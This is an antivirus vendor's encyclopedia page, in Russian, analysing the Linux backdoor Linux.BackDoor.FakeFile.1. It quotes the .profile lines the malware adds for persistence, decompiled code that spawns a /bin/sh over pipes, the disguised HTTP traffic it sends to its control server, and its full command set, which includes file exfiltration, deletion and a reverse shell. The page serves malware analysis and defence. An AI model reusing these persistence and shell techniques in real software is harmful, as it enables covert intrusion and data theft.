Поддержка
Круглосуточная поддержка

Позвоните

Бесплатно по России:
8-800-333-79-32

ЧаВо | Форум

Ваши запросы

  • Все: -
  • Незакрытые: -
  • Последний: -

Позвоните

Бесплатно по России:
8-800-333-79-32

Свяжитесь с нами Незакрытые запросы: 

Профиль

Профиль

Linux.BackDoor.FakeFile.1

Добавлен в вирусную базу Dr.Web: 2016-10-14

Описание добавлено:

SHA1:

  • 0138fc4d50c734e288388f7c8cbbea5e2ad08a8b

Троянец-бэкдор для операционных систем семейства Linux. При запуске сохраняет свою копию в файле:

<HOME>/.gconf/apps/gnome-common/gnome-common

Затем ищет в папке, из которой был запущен, скрытый файл с именем, соответствующим своему имени, после чего перемещает его на место исполняемого файла. Например, если ELF-файл Linux.BackDoor.FakeFile.1 имел имя AnyName.pdf, он будет искать скрытый файл с именем .AnyName.pdf, после чего сохранит его вместо оригинального файла командой mv .AnyName.pdf AnyName.pdf.

Если файл обнаружен, открывает соответствующее приложение для просмотра файла:

Расширениеприложение
".doc .DOC .xls. XLS .ppt .PPT .docx .DOCX .xlsx .XLSX .pptx .PPTX .odt .ODT .ods .ODS .odp .ODP"soffice
".pdf .PDF"evince
все остальноеgedit

Если файл отсутствует, создает его и открывает в приложении gedit. После этого троянец поверяет имя дистрибутива Linux, используемого в атакуемой системе: если оно отличается от openSUSE, в файлы <HOME>/.profile или <HOME>/.bash_profile записываются следующие строки:

# if execute the gnome-common
if [ -d "$HOME/.gconf/apps/gnome-common/" ] ; then
    "$HOME/.gconf/apps/gnome-common/gnome-common"
fi

Запуск приложения для просмотра файла и собственной копии осуществляется следующим образом:

pipe(v32);
pipe(v31);
status = fork();
if ( !status )
{
  close(0);
  dup(v31[0]);
  close(1);
  dup(v32[1]);
  close(2);
  dup(v32[1]);
  close(v32[1]);
  close(v31[0]);
  close(v32[0]);
  close(v31[1]);
  sleep(1u);
  while ( execl("/bin/sh", "/bin/sh", 0) < 0 )
    sleep(1u);
  exit(status);
}
v50 = dup(0);
v51 = dup(1);
v52 = dup(2);
close(0);
dup(v32[0]);
close(1);
dup(v31[1]);
close(v31[1]);
close(v32[0]);
close(v31[0]);
close(v32[1]);
write(1, s1, strlen(s1));
write(1, &unk_8053D40, 1u);

Если вредоносная программа была запущена из папки <home>/.gconf/apps/gnome-common/gnome-common, троянец извлекает из собственного файла и расшифровывает конфигурационные данные, после чего запускает два потока: один обменивается информацией с управляющим сервером, второй следит за длительностью соединения. Если троянцу не поступало команд более 30 минут, соединение разрывается. При обмене информацией с управляющим сервером его ответы маскируются под http-запросы следующего вида:

GET /index.asp?title=Welcome&picture=welcome.gif<зашифрованная строка>
HTTP/1.0
Host: <IP-адрес жертвы>
User-Agent: Mozilla/4.0
Connection: Keep-Alive
Accept: * /*
User-Agent:Mozilla/4.0 (compatible; MSIE 5.00; Windows 98)
Pragma: no-cache

Linux.BackDoor.FakeFile.1 может выполнять следующие команды:

имяНазначение
RRпередать на управляющий сервер кол-во сообщений, отправленных в ходе текущего соединения
DRпередать список содержимого заданной папки
DFпередать на управляющий сервер указанный файл или папку со всем содержимым
D1удалить файл с помощью команды rm –r
D0удалить файл с помощью команды unlink
RFпереименовать указанную папку
USудалить себя
RPзапустить новую копию процесса
QQзакрыть текущее соединение
RTорганизовать backconnect и запустить sh
CPзавершить выполнение бэкдора
FFоткрыть исполняемый файл процесса на запись
COзакрыть файл процесса
BFсоздать файл или папку
FDзаписать переданные значения в файл
EFполучить листинг директории с помощью команды ls
CXустановить права 777 на указанный файл
CRзавершить backconnect

Новость о троянце

Рекомендации по лечению


Linux

На загруженной ОС выполните полную проверку всех дисковых разделов с использованием продукта Антивирус Dr.Web для Linux.

Демо бесплатно

На 1 месяц (без регистрации) или 3 месяца (с регистрацией и скидкой на продление)

Скачать Dr.Web

По серийному номеру